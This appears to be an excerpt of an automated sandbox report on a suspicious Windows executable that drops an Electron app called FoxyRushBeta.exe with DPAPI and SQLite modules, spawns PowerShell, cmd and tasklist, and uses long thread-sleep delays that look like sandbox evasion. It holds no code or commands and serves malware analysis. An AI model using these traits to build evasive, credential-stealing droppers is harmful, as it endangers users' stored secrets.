Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\ffmpeg.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\System.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\FoxyRushBeta.exe
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\LICENSE.electron.txt
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2644
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1630
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\System.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\d3dcompiler_47.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 Thread sleep count: 3626 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168 Thread sleep count: 2536 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5452 Thread sleep count: 2644 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876 Thread sleep count: 1630 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
